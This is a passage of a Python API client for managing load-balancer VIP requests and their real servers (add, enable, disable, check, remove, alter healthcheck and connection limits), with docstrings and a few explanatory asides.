:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'add'
vip_map['network_version'] = IP_VERSION.IPv4[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def add_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -add.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'add'
vip_map['network_version'] = IP_VERSION.IPv6[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def habilitar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -ena.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'ena'
vip_map['network_version'] = IP_VERSION.IPv4[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def enable_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -ena.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'ena'
vip_map['network_version'] = IP_VERSION.IPv6[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def desabilitar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -dis.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'dis'
vip_map['network_version'] = IP_VERSION.IPv4[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def disable_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -dis.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'dis'
vip_map['network_version'] = IP_VERSION.IPv6[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def checar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -chk.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'chk'
vip_map['network_version'] = IP_VERSION.IPv4[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def check_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -chk.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'chk'
vip_map['network_version'] = IP_VERSION.IPv6[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def remover(self, id_vip, keep_ip=False):
"""Removes a vip request by its identifier.
:param id_vip: Vip request identifier.
:return: None
:raise RequisicaoVipNaoExisteError: Vip request does not exist.
:raise InvalidParameterError: Vip request is none or invalid.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'Vip request identifier is invalid or was not informed.')
url = 'vip/delete/' + str(id_vip) + '/'
if keep_ip:
# there is no standard way to pass parameters to DELETE,
# so use the querystring, which every HTTP library supports
url = "%s?keep_ip=1" % url
code, xml = self.submit(None, 'DELETE', url)
return self.response(code, xml)
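Because DELETE bodies are not uniformly supported, remover() signals keep_ip through the querystring. The URL construction can be sketched in isolation as:

```python
# Mirrors the URL logic in remover(): the keep_ip flag travels in the
# querystring rather than in a DELETE request body.
def build_delete_url(id_vip, keep_ip=False):
    url = 'vip/delete/' + str(id_vip) + '/'
    if keep_ip:
        url = "%s?keep_ip=1" % url
    return url

print(build_delete_url(42, keep_ip=True))
# vip/delete/42/?keep_ip=1
```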
def validate(self, id_vip):
"""Validates a vip request by its identifier.
:param id_vip: Vip request identifier.
:return: None
:raise RequisicaoVipNaoExisteError: Vip request does not exist.
:raise InvalidParameterError: Vip request identifier is none or invalid.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'Vip request identifier is invalid or was not informed.')
url = 'vip/validate/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def remover_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -del.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'del'
vip_map['network_version'] = IP_VERSION.IPv4[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def remove_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -del.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
:param port_real: Port Real. Integer value between 1 and 65535.
:return: Following dictionary:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP, Equipment, or IP is null or invalid.
:raise EquipamentoNaoExisteError: Equipment not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'del'
vip_map['network_version'] = IP_VERSION.IPv6[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def alterar(
self,
id_vip,
id_ip,
id_healthcheck_expect,
validado,
vip_criado,
finalidade,
cliente,
ambiente,
cache,
metodo_bal,
persistencia,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
dsr,
bal_ativo,
transbordos,
reals,
portas_servicos):
"""Changes a VIP request by its identifier.
:param id_vip: Identifier of the VIP request.
:param id_ip: Identifier of the IP.
:param id_healthcheck_expect: Identifier of the healthcheck expect.
:param validado: Indicates whether the VIP is validated ('0' or '1').
:param vip_criado: Indicates whether the VIP was created ('0' or '1').
:param finalidade: Finality.
:param cliente: Client.
:param ambiente: Environment.
:param cache: Cache.
:param metodo_bal: Balancing method.
:param persistencia: Persistence.
:param healthcheck_type: Healthcheck type.
:param healthcheck: Healthcheck.
:param timeout: Timeout.
:param host: Host.
:param maxcon: Maximum number of connections.
:param dsr: DSR.
:param bal_ativo: Active balancer.
:param transbordos: List of overflow server IPs. Ex: ['10.10.100.1','192.168.1.1'].
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param portas_servicos: List of ports. Ex: ['80','8080','445'].
:return: None
:raise VipError: It is not allowed to change the IP of a VIP request that has already been created.
:raise InvalidParameterError: The identifier of the IP and/or of the VIP request is null or invalid.
:raise InvalidParameterError: The value of finalidade, cliente, ambiente, cache, metodo_bal, persistencia,
healthcheck_type, healthcheck, timeout, host, maxcon, dsr, bal_ativo, transbordos, reals or portas is invalid.
:raise IpNaoExisteError: IP not registered.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect not registered.
:raise VipNaoExisteError: VIP request not registered.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to read the request XML or to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
vip_map = dict()
vip_map['id_ip'] = id_ip
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['validado'] = validado
vip_map['vip_criado'] = vip_criado
vip_map['finalidade'] = finalidade
vip_map['cliente'] = cliente
vip_map['ambiente'] = ambiente
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = metodo_bal
vip_map['persistencia'] = persistencia
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['dsr'] = dsr
vip_map['bal_ativo'] = bal_ativo
vip_map['transbordos'] = {'transbordo': transbordos}
vip_map['reals'] = {'real': reals}
vip_map['portas_servicos'] = {'porta': portas_servicos}
url = 'vip/' + str(id_vip) + '/'
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
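The list-valued fields above are wrapped in single-key dictionaries before submission, because the XML layer serializes each list entry as a named child element. A minimal, hypothetical sketch of that wrapping convention (`wrap_vip_lists` is illustrative only, not part of the client):

```python
def wrap_vip_lists(transbordos, reals, portas_servicos):
    """Wrap plain lists in the single-key dicts the XML payload expects.

    Illustrative helper only; mirrors the vip_map assignments in alterar().
    """
    return {
        'transbordos': {'transbordo': transbordos},
        'reals': {'real': reals},
        'portas_servicos': {'porta': portas_servicos},
    }

payload = wrap_vip_lists(
    ['10.10.100.1'],
    [{'real_name': 'Teste1', 'real_ip': '10.10.10.1'}],
    ['80', '8080'])
```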
def buscar(self, id_vip):
"""Gets a VIP request by its identifier.
:param id_vip: Identifier of the VIP request.
:return: Dictionary with the following structure:
::
{'vip': {'id': < id >,
'validado': < validado >,
'finalidade': < finalidade >,
'cliente': < cliente >,
'ambiente': < ambiente >,
'cache': < cache >,
'metodo_bal': < metodo_bal >,
'persistencia': < persistencia >,
'healthcheck_type': < healthcheck_type >,
'healthcheck': < healthcheck >,
'timeout': < timeout >,
'host': < host >,
'maxcon': < maxcon >,
'dsr': < dsr >,
'bal_ativo': < bal_ativo >,
'transbordos':{'transbordo':[< transbordo >, ... other transbordos ...]},
'reals':{'real':[{'real_name':< real_name >, 'real_ip':< real_ip >}, ... other reals ...]},
'portas_servicos':{'porta':[< porta >, ... other portas ...]},
'vip_criado': < vip_criado >,
'id_ip': < id_ip >,
'id_ipv6': < id_ipv6 >,
'id_healthcheck_expect': < id_healthcheck_expect >}}
:raise VipNaoExisteError: VIP request not registered.
:raise InvalidParameterError: The identifier of the VIP request is null or invalid.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
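buscar() guards its URL construction with is_valid_int_param, a helper defined elsewhere in the networkapi utils. A hedged re-implementation of the check it appears to perform (accepting a positive integer given as an int or numeric string is an assumption about the real helper's exact semantics):

```python
def is_valid_int_param(param):
    """Return True for positive integers passed as int or numeric string.

    Sketch of the validation used by buscar() and related methods; the
    real helper ships with the networkapi client library.
    """
    if param is None:
        return False
    try:
        return int(param) > 0
    except (TypeError, ValueError):
        return False
```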
def find_vip_requests(self, id_vip, ip, pagination, create=None):
"""Get VIPs by id or ipv4 or ipv6.
:return: Dictionary with the following structure:
::
{'vip': {'id': < id >,
'validado': < validado >,
'ambiente': < ambiente >,
'ip':<ip>,
'descricao':<descricao>,
'equipamento':<equipamentos>,
'criado':<criado>,
'is_more':<is_more>, ... other vips ... } }
:raise VipNaoExisteError: VIP request not registered.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'requestvip/get_by_ip_id/'
vip_map = dict()
vip_map["start_record"] = pagination.start_record
vip_map["end_record"] = pagination.end_record
vip_map["asorting_cols"] = pagination.asorting_cols
vip_map["searchable_columns"] = pagination.searchable_columns
vip_map["custom_search"] = pagination.custom_search
vip_map['id_vip'] = id_vip
vip_map['ip'] = ip
vip_map['create'] = create
code, xml = self.submit({'vip': vip_map}, 'POST', url)
key = "vip"
return get_list_map(
self.response(
code, xml, [
"equipments", "environments", "ips"]), key)
def get_by_id(self, id_vip):
"""Get VIPs by id.
:return: Dictionary with the following structure:
::
{'vip': {'id': < id >,
'validado': < validado >,
'ips':<list of vip's ips (v4 and/or v6)>,
'descricao':<descricao>,
'equipamento':<equipamentos>,
'criado':<criado>,
'environent':<ambientes>,
'ipv4_description':<descricao ipv4>,
'ipv6_description':<descricao ipv6>,
'variaveis':<variaveis>,
'id_healthcheck_expect': < id_healthcheck_expect >,
'cache': < cache >}}
:raise VipNaoExisteError: VIP request not registered.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'requestvip/getbyid/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
key = "vip"
return get_list_map(
self.response(
code, xml, [
"equipamento", "ips"]), key)
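get_by_id funnels the response through get_list_map, which normalizes the value under a key into a list (the XML decoder yields a bare dict when only one element is present). A hypothetical sketch of that behavior; the real helper ships with the networkapi utils:

```python
def get_list_map(response_map, key):
    """Ensure response_map[key] is a list, wrapping a lone element.

    Illustrative re-implementation of the list-normalization helper
    used by find_vip_requests() and get_by_id().
    """
    if response_map is None or key not in response_map:
        return response_map
    if not isinstance(response_map[key], list):
        response_map[key] = [response_map[key]]
    return response_map
```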
def get_all(self):
"""Get all VIPs.
:return: Dictionary with the following structure:
::
{'vip_< id >': {'id': < id >,
'validado': < validado >,
'finalidade': < finalidade >,
'cliente': < cliente >,
'ambiente': < ambiente >,
'cache': < cache >,
'metodo_bal': < metodo_bal >,
'persistencia': < persistencia >,
'healthcheck_type': < healthcheck_type >,
'healthcheck': < healthcheck >,
'timeout': < timeout >,
'host': < host >,
'maxcon': < maxcon >,
'dsr': < dsr >,
'bal_ativo': < bal_ativo >,
'transbordos':{'transbordo':[< transbordo >, ... other transbordos ...]},
'reals':{'real':[{'real_name':< real_name >, 'real_ip':< real_ip >}, ... other reals ...]},
'portas_servicos':{'porta':[< porta >, ... other portas ...]},
'vip_criado': < vip_criado >,
'id_ip': < id_ip >,
'id_ipv6': < id_ipv6 >,
'id_healthcheck_expect': < id_healthcheck_expect >} ... other vips ... }
:raise VipNaoExisteError: VIP request not registered.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'vip/all/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def get_by_ipv4(self, ipv4, all_prop=0):
"""Get VIPs related to an IPv4 address.
:param ipv4: The IPv4 address to find all related VIPs.
:param all_prop: (Optional) Gets all properties, not only ids. (0 or 1)
:return: Dictionary with the following structure:
::
{'ips': [ {'vips': '[< id >, < id >]', 'oct4': < oct4 >, 'oct2': < oct2 >,
'oct3': < oct3 >, 'oct1': < oct1 >, 'networkipv4': < networkipv4 >,
'id': <id >, 'descricao': < descricao >}, ... ] }
:raise VipNaoExisteError: VIP request not registered.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'vip/ipv4/all/'
vip_map = dict()
vip_map['ipv4'] = ipv4
vip_map['all_prop'] = all_prop
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml, ['vips'])
def get_by_ipv6(self, ipv6, all_prop=0):
"""Get VIPs related to an IPv6 address.
:param ipv6: The IPv6 address to find all related VIPs.
:param all_prop: (Optional) Gets all properties, not only ids. (0 or 1)
:return: Dictionary with the following structure:
::
{'ips': [ {'vips': '[< id >, < id >]', 'block4': < block4 >, 'block2': < block2 >,
'block3': < block3 >, 'block1': < block1 >, 'block5': < block5 >,
'block6': < block6 >, 'block7': < block7 >, 'block8': < block8 >,
'networkipv6': < networkipv6 >, 'id': <id >, 'descricao': < descricao >}, ... ] }
:raise VipNaoExisteError: VIP request not registered.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'vip/ipv6/all/'
vip_map = dict()
vip_map['ipv6'] = ipv6
vip_map['all_prop'] = all_prop
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def criar(self, id_vip):
"""Executes the script 'gerador_vips' with the --cria option.
The script will only be executed if the VIP request has been
validated and has not yet been created.
After the script runs, the 'vip_criado' field receives the value '1'.
:param id_vip: Identifier of the VIP request.
:return: Dictionary with the following structure:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: VIP request not registered.
:raise VipError: The VIP is not validated or has already been created.
:raise InvalidParameterError: The identifier of the VIP request is null or invalid.
:raise ScriptError: Failed to execute the script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
url = 'vip/create/'
vip_map = dict()
vip_map['id_vip'] = id_vip
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def remove_script(self, id_vip):
"""Executes the script 'gerador_vips' with the --remove option.
The script will only be executed if the VIP request has been
validated and created.
After the script runs, the 'vip_criado' field receives the value '0'.
:param id_vip: Identifier of the VIP request.
:return: Dictionary with the following structure:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: VIP request not registered.
:raise VipError: The VIP is not validated or is not created.
:raise InvalidParameterError: The identifier of the VIP request is null or invalid.
:raise ScriptError: Failed to execute the script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
url = 'vip/remove/'
vip_map = dict()
vip_map['id_vip'] = id_vip
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def alter_maxcon(self, id_vip, maxcon):
"""Change the connection limit of a VIP by its identifier.
:param id_vip: Identifier of the VIP request.
:param maxcon: Connection limit.
:return: Dictionary with the following structure:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the VIP request is invalid or null.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
:raise EnvironmentVipError: The combination of finality, client and environment is invalid.
:raise InvalidTimeoutValueError: The value of timeout is invalid.
:raise InvalidBalMethodValueError: The value of method_bal is invalid.
:raise InvalidCacheValueError: The value of cache is invalid.
:raise InvalidPersistenceValueError: The value of persistence is invalid.
:raise InvalidPriorityValueError: One of the priority values is invalid.
:raise EquipamentoNaoExisteError: The equipment associated with this Vip Request doesn't exist.
:raise IpEquipmentError: Association between equipment and ip of this Vip Request doesn't exist.
:raise IpError: IP not registered.
:raise RealServerPriorityError: Vip Request priority list has an error.
:raise RealServerWeightError: Vip Request weight list has an error.
:raise RealServerPortError: Vip Request port list has an error.
:raise RealParameterValueError: Vip Request real server parameter list has an error.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
if not is_valid_int_param(maxcon):
raise InvalidParameterError(
u'The maxcon is invalid or was not informed.')
url = 'vip/' + str(id_vip) + '/maxcon/' + str(maxcon) + '/'
code, xml = self.submit(None, 'PUT', url)
return self.response(code, xml)
def alter_healthcheck(
self,
id_vip,
healthcheck_type,
healthcheck=None,
id_healthcheck_expect=None):
"""Change VIP's healthcheck config by the identifier.
:param id_vip: Identifier of the request VIP.
:param healthcheck_type: healthcheck_type.
:param healthcheck: The URL to be checked. (Only if healthcheck_type is HTTP)
:param id_healthcheck_expect: Identifier of the expected result. (Only if healthcheck_type is HTTP)
:return: Dictionary with the following structure:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the VIP request is invalid or null.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
:raise EnvironmentVipError: The combination of finality, client and environment is invalid.
:raise InvalidTimeoutValueError: The value of timeout is invalid.
:raise InvalidBalMethodValueError: The value of method_bal is invalid.
:raise InvalidCacheValueError: The value of cache is invalid.
:raise InvalidPersistenceValueError: The value of persistence is invalid.
:raise InvalidPriorityValueError: One of the priority values is invalid.
:raise EquipamentoNaoExisteError: The equipment associated with this Vip Request doesn't exist.
:raise IpEquipmentError: Association between equipment and ip of this Vip Request doesn't exist.
:raise IpError: IP not registered.
:raise RealServerPriorityError: Vip Request priority list has an error.
:raise RealServerWeightError: Vip Request weight list has an error.
:raise RealServerPortError: Vip Request port list has an error.
:raise RealParameterValueError: Vip Request real server parameter list has an error.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/' + str(id_vip) + '/healthcheck/'
vip_map = dict()
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def alter_priority(self, id_vip, reals_prioritys):
"""Change the reals_priority list of a VIP by its identifier.
:param id_vip: Identifier of the VIP request.
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:return: Dictionary with the following structure:
::
{'sucesso': {'codigo': < codigo >,
'descricao': {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the VIP request is invalid or null.
:raise DataBaseError: Networkapi failed to access the database.
